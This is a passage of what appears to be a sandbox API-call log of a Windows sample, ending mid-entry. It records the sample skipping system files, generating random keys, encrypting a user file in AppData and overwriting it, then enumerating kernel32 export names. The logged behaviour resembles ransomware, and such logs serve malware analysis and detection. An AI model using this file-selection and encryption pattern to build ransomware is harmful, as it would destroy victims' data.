[0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="bootsect.bak") returned 1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="ntuser.dat.log") returned -1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="thumbs.db") returned -1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="Bootfont.bin") returned 1 [0077.006] lstrlenW (lpString="CXtBKJuR4xY5m c.swf") returned 19 [0077.006] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0077.006] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0077.006] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0077.006] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0077.006] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.006] lstrlenW (lpString="CXtBKJuR4xY5m c.swf") returned 19 [0077.006] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.006] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="CXtBKJuR4xY5m c.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf" [0077.006] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cxtbkjur4xy5m c.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.006] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=13359) returned 1 [0077.007] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.007] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.007] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.007] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.007] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.007] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.007] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.008] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.008] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.008] CloseHandle (hObject=0x444) returned 1 [0077.009] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.009] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.009] CloseHandle (hObject=0x0) returned 0 [0077.009] CloseHandle (hObject=0x440) returned 1 [0077.010] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.010] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.010] GetTickCount () returned 0x114bc2e [0077.010] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.011] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.011] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.011] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.011] lstrlenA (lpString="kernel32.dll") returned 12 [0077.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.011] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.011] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.012] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.012] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.012] lstrlenA (lpString="ADDATOMA") returned 8 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.012] lstrlenA (lpString="ADDATOMW") returned 8 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.012] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.012] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.012] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.012] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.012] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.012] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.012] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.012] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.012] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.012] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.012] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.012] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.012] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.012] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.012] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.013] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.013] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.013] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.013] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.013] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.013] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.013] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.013] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.013] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.013] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.013] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.013] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.013] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.013] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.013] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.013] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.013] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.013] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.014] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.014] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.014] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.014] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.014] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.014] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.014] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.014] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.014] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.014] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.015] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.015] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.015] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.015] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.015] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.015] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.015] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.015] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.015] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.015] lstrlenA (lpString="BEEP") returned 4 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.015] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.015] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.015] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.015] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.015] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.015] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.015] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.015] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.015] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.015] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.016] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.016] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.016] lstrlenA (lpString="CANCELIO") returned 8 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.016] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.016] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.016] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.016] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.016] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.016] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.016] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.016] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.016] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.016] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.016] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.016] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.016] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.016] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.016] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.017] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.017] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.017] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.017] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.017] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.017] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.017] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.017] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.017] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.017] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.017] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") 